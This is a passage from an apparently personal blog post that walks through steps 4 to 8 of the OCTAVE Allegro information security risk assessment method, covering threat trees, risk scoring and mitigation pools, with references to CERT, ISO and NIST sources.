Step 4‘s goal is to identify major areas of concern. Thereby the method foresees to consider all containers and to identify issues that could affect assets within the container. The compiled list of ‚Äúareas of concern‚ÄĚ is then expanded with the according actor, the means to realise the threat, the motive of the actor and the potential outcome. Whereby an outcome is always one out of disclosure, modification, interruption or destruction. The method documentation further lists loss next to destruction. An example, implicitly referencing the affected information asset, is provided in table 4. This step does not aim to identify a complete list of threats but helps to capture the major concerns in short time.

Table 4: OCTAVE Allegro Step 4: Identify Areas of Concern. Area of Concern Example

Note, that I have made use of this step in order to capture area of concerns for the smart meter and wireless M-Bus analysis within my master thesis.

Step 5 ensures structured identification of all potential threats. Threat trees ensure robust consideration of threats. The step relies on four trees in total. Two considering human actors with either technical or physical means and two considering technical and other problems. Part of the ‚ÄúHuman Actors Using Technical Means‚ÄĚ tree originating of the methodology documentation [1] is shown in figure 2.

Figure 2: OCTAVE Allegro “Human Actors Using Technical Means” Tree [1]

With each information asset, each branch of the four trees will be traversed to ensure thorough coverage and identification of threats. The guidance provides worksheets and questionnaires to simplify the activity. The result of the walk through will be a comprehensive list of threat entries as shown in table 4. Optionally, each resulting list entry can be assigned the probability of the realisation of the concerned threat scenarios with either low, medium or high likelihood.
As this is a tedious task in an assessment based on OCTAVE Allegro, I would not dig too much into it unless the previous step ‚ÄúIdentify Areas of Concern‚ÄĚ does not provide sufficient material or the analysis significantly lacks coverage. However, if thorough coverage is a requirement, that step cannot be circumvented.

Step 6 consists of a single activity and aims to identify the impact if a certain threat scenario becoming realised. Following that, each threat scenario will be attributed a consequence. Thus, table 4 has been expanded with an additional column to describe the consequence for each scenario. Part of table 4 and the newly added column is shown in table 5.

Table 5: OCTAVE Allegro Step 6: Identify Risks. Risk Example

Step 7 focuses on creation of a relative risk scores for each identified threat scenario. The impact on each impact area as well as the impact area importance will be reflected in the total risk score. The score should help to decide on what mitigation approach to choose in the ultimate step of the methodology. Assumed the impact area ranking in table 6 and threat scenario listed in table 5 the risk score for that specific scenario calculates as shown in table 6.


Table 6: OCTAVE Allegro Step 7: Analyse Risk. Example Risk Score Calculation

Basically, for each impact area the impact will be measured according to the criteria defined in step 1. An example of such criteria is provided in table 1. High impact will be assigned a value of three and low impact accordingly a value of one. The impact area ranking is then multiplied with the threat scenario impact value whereby the result of that calculation contributes to the total risk score.

Step 8 the ultimate step in the OCTAVE Allegro qualitative risk assessment method deals with the mitigation approach of identified risks. In general risks can be accepted, mitigated, transferred, avoided or being further monitored (deferred) whereas mitigation aims to avoid or limit the risk. However, the efforts for avoidance and limitation should never outweigh a potential impact.
Though numbers have been assigned as risk scores, their specific value only provides indication to whether a risk should to be mitigated or not. One might also take the likelihood of occurrence and some organisation specifics into account. It is suggested to divide the risks into four pools, pool one to pool four, whereby each pool groups threats for a range of the total risk score. The four pools are then approached as follows:

  • Pool 1: Mitigate
  • Pool 2: Mitigate or Defer
  • Pool 3: Defer or Accept
  • Pool 4: Accept

Depending on whether probabilities have been assigned in step 5 of the methodology it is suggested to either form a list of all risks and then split it into four pools or create a matrix which reflects the four pools and takes the probability into account. Finally, a mitigation strategy should be formulated for all risks that need to be mitigated. The mitigation strategy should list the information asset container to which the controls will be applied. Plus, the chosen strategy should consider and outline potential residual risks. An example of such a mitigation strategy is provided in table 7.

Table 7: OCTAVE Allegro Step 8: Select Mitigation Approach. Mitigation Strategy Example


OCTAVE Allegro is a lean risk assessment method and does not provide guidance in selecting security controls as with extensive information security management standards such as ISO 27000 [4]. However, ISO 27002 [5] and NIST SP 800-53 [6] provide a comprehensive list of controls to choose from, if needed.


[1] R.A. Caralli, J.F. Stevens, L.R. Young, W.R. Wilson. The OCTAVE Allegro Guidebook, v1.0. Cert Program, Software Engineering Institute, Carnegie Mellon University, Pittsburgh, PA 15213. May 2007, Online
[2] R.A. Caralli, J.F. Stevens, L.R. Young, W.R. Wilson. Introducing OCTAVE Allegro: Improving the Information Security Risk Assessment Process. CMU/SEI-2007-TR-012, CERT Program, Software Engineering Institute, Carnegie Mellon University, Pittsburgh, PA 15213. May 2007, Online
[3] G. Sindre and A.L. Opdahl. Eliciting security requirements with misuse cases. Requirements Engineering Vol. 10 No. 1, pp. 34-44. Jun. 2004 (DOI 10.1007/s00766-004-0194-4)
[4] ISO-27000:2009: Information technology – Security techniques – Information security management systems – Overview and vocabulary
[5] ISO 27002:2005: Information technology – Security techniques – Code of practice for information security management
[6] NIST. Security and Privacy Controls for Federal Information Systems and Organizations. Special Publication 800-53, Rev. 4, Final Public Draft, Feb. 2013, Online